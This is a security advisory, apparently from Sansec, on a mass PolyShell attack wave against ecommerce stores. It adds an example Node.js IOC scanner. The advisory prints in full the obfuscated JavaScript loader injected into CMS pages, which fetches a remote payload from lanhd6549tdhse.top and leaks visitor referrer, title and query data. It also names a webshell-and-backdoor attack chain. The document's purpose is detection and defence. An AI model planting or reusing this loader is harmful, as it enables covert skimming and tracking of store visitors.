Mass PolyShell attack wave hits 471 stores in one hour
by Sansec Forensics Team · Published in Threat Research · March 30, 2026

Sansec detected 471 stores compromised in a single hour as attackers exploit the PolyShell vulnerability at scale. The attack injects obfuscated JavaScript from the freshly registered domain lanhd6549tdhse.top. New victims are still coming in every minute.

Sansec is tracking a mass exploitation wave of the PolyShell vulnerability that hit hundreds of online stores within a single hour today. The attacks are ongoing: new victims appear every minute. None of the compromised stores are Sansec customers. Sansec Shield has been blocking PolyShell attacks since March 16th.

What's being injected

After gaining access through PolyShell, attackers inject obfuscated JavaScript into CMS pages and static blocks. The script uses localStorage for persistence and loads an external payload from lanhd6549tdhse.top:

```html
<script type="application/javascript">
// Stage 1: if a payload was staged in localStorage on an earlier page load,
// run it through an inline onclick handler on a throwaway element, then clear it.
(function(){
  var id='136c1e07507f4a97';
  var store=localStorage.getItem(id);
  if(store){
    var e=document.createElement('a');
    e.setAttribute('onclick',atob(store));
    e.click();
    localStorage.removeItem(id)
  }
}());
// Stage 2: load the external script, appending the visitor's referrer,
// page title and query string to the (base64-obfuscated) loader URL.
(function(){
  var d=document;
  var s=d.createElement('script');
  s.src=atob('aHR0cHM6Ly9sYW5oZDY1NDl0ZGhzZS50b3AvS1p0QnNjZ2I/JnNlX3JlZmVycmVyPQ==')
    +encodeURIComponent(d.referrer)
    +'&default_keyword='+encodeURIComponent(d.title)
    +'&'+window.location.search.replace('?','&')
    +'&frm=script';
  if(d.currentScript){
    d.currentScript.parentNode.insertBefore(s,d.currentScript);
  } else {
    d.getElementsByTagName('head')[0].appendChild(s);
  }
}());
</script>
```

The base64 string decodes to https://lanhd6549tdhse.top/KZtBscgb?&se_referrer= .
The script fingerprints every visitor by sending the referrer, page title, and query parameters to that URL. The domain was registered just four days ago, and Sansec is currently the only vendor on VirusTotal that flags it as malicious.

The first stage checks localStorage for a previously stored payload (keyed by 136c1e07507f4a97). If found, it executes the payload via a synthetic click event and then removes it. This lets the attacker persist malicious behavior across page loads without re-fetching it from the external server.

The attack chain

These compromises follow the same pattern Sansec has documented over the past two weeks:

1. The attacker uploads a PHP webshell via the PolyShell vulnerability.
2. The webshell drops accesson.php backdoors across multiple directories.
3. The attacker injects the JavaScript loader into CMS content.

The speed of this wave shows that the attackers have fully automated the exploitation chain, from initial upload to JavaScript injection.

Indicators of compromise

| Type | Value |
| --- | --- |
| Loader domain | lanhd6549tdhse.top |
| Loader URL | https://lanhd6549tdhse.top/KZtBscgb |
| localStorage key | 136c1e07507f4a97 |
| Backdoor filename | accesson.php |
| Backdoor beacon | 8194460 (result of 409723*20) |

Use a specialized ecommerce scanner like eComscan to check your store for these and other indicators of compromise. Manual searches only catch known IOCs, while eComscan detects the full range of PolyShell payloads, backdoors, and injected scripts.

Recommendations

- Block attacks: deploy Sansec Shield to block PolyShell exploitation attempts in real time.
- Scan for compromise: run eComscan to detect uploaded webshells, backdoors, and injected JavaScript.

For full technical details on the PolyShell vulnerability and all known payloads, see our main PolyShell advisory.
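As an added example (not Sansec's code and not part of the original post), the Node.js script below ties the loader analysis and the IOC list together: it decodes the obfuscated loader URL, rebuilds the fingerprinting request exactly as the injected script concatenates it, replays the localStorage persistence stage offline without executing the staged payload, and hunts for the published indicators in CMS content and a file listing. It also shows why a plain text search for the domain misses this loader: the domain never appears in clear, only inside the base64 literal, so the scanner matches all three base64 alignments of the domain. The CMS rows, file paths, sample page and localStorage dump are constructed test data; only the IOC values come from the post.

```javascript
'use strict';
// Added example, not Sansec's code: analyses the PolyShell JavaScript loader
// shown above and hunts for its published indicators. Sample data at the
// bottom is constructed; only the IOC values are from the post.

const IOC = {
  loaderDomain: 'lanhd6549tdhse.top',
  loaderUrl: 'https://lanhd6549tdhse.top/KZtBscgb',
  storageKey: '136c1e07507f4a97',
  backdoorFile: 'accesson.php',
};

// The base64 literal from the injected script, copied verbatim.
const LOADER_B64 =
  'aHR0cHM6Ly9sYW5oZDY1NDl0ZGhzZS50b3AvS1p0QnNjZ2I/JnNlX3JlZmVycmVyPQ==';

// 1. Recover the obfuscated loader URL.
function decodeLoaderUrl(b64 = LOADER_B64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

// 2. Rebuild the request the loader sends for a visited page, concatenated
//    exactly as the injected script does it (referrer, title, query string).
//    `page` stands in for document.referrer / document.title / location.search.
function buildBeaconUrl(page, b64 = LOADER_B64) {
  return decodeLoaderUrl(b64)
    + encodeURIComponent(page.referrer)
    + '&default_keyword=' + encodeURIComponent(page.title)
    + '&' + page.search.replace('?', '&')
    + '&frm=script';
}

// 3. Replay the persistence stage offline. Given a localStorage dump from a
//    victim browser, return the script the synthetic click would have run
//    (decoded but NOT executed) and remove the key, as the loader does.
function replayStoredPayload(storage) {
  const staged = storage[IOC.storageKey];
  if (staged === undefined) return null;
  delete storage[IOC.storageKey];
  return Buffer.from(staged, 'base64').toString('utf8');
}

// 4. Generate the three base64 alignments of a string so its encoded form can
//    be matched wherever it sits inside a larger base64 blob.
function base64Needles(s) {
  return [0, 1, 2].map((pad) => {
    const bytes = Buffer.concat([Buffer.alloc(pad), Buffer.from(s, 'utf8')]);
    let enc = bytes.toString('base64').replace(/=+$/, '');
    enc = enc.slice([0, 2, 3][pad]);                     // chars mixed with padding bytes
    if (bytes.length % 3 !== 0) enc = enc.slice(0, -1);  // last char mixed with zero fill
    return enc;
  });
}

// 5. Scan CMS content (rows dumped from cms_page / cms_block) for the loader:
//    plain domain, base64-encoded domain in any alignment, and the storage key.
function scanCmsRows(rows) {
  const needles = [
    ...base64Needles(IOC.loaderDomain).map((n) => ['loader-domain-base64', n]),
    ['loader-domain', IOC.loaderDomain],
    ['localstorage-key', IOC.storageKey],
  ];
  const hits = [];
  for (const row of rows) {
    for (const [indicator, needle] of needles) {
      if (row.content.includes(needle)) hits.push({ id: row.id, indicator });
    }
  }
  return hits;
}

// 6. Flag dropped backdoors by filename anywhere in a file listing.
function findBackdoors(paths) {
  return paths.filter((p) => p.split('/').pop() === IOC.backdoorFile);
}

// Constructed sample data (not real forensic evidence). Row 2 is an excerpt of
// the loader above; note that the domain is absent in clear text.
const SAMPLE_ROWS = [
  { id: 'cms_block:1', content: '<p>Free shipping on orders over $50</p>' },
  { id: 'cms_block:2', content: '<script type="application/javascript">(function(){'
      + "var id='136c1e07507f4a97';var store=localStorage.getItem(id);}());"
      + "(function(){var s=document.createElement('script');"
      + "s.src=atob('" + LOADER_B64 + "')+'&frm=script';}());</script>" },
];
const SAMPLE_FILES = ['pub/media/accesson.php', 'app/etc/env.php', 'var/accesson.php', 'index.php'];
const SAMPLE_PAGE = { referrer: 'https://www.google.com/', title: 'Shop', search: '?q=shoes' };

function runDemo() {
  return {
    loaderUrl: decodeLoaderUrl(),
    beaconUrl: buildBeaconUrl(SAMPLE_PAGE),
    cmsHits: scanCmsRows(SAMPLE_ROWS),
    backdoors: findBackdoors(SAMPLE_FILES),
  };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

Against a real store, feed scanCmsRows the content column of cms_page and cms_block and findBackdoors a recursive listing of the document root; the beacon URL shows an analyst exactly what a visitor's browser leaks on every page view (the doubled `&&` comes from the loader's own concatenation).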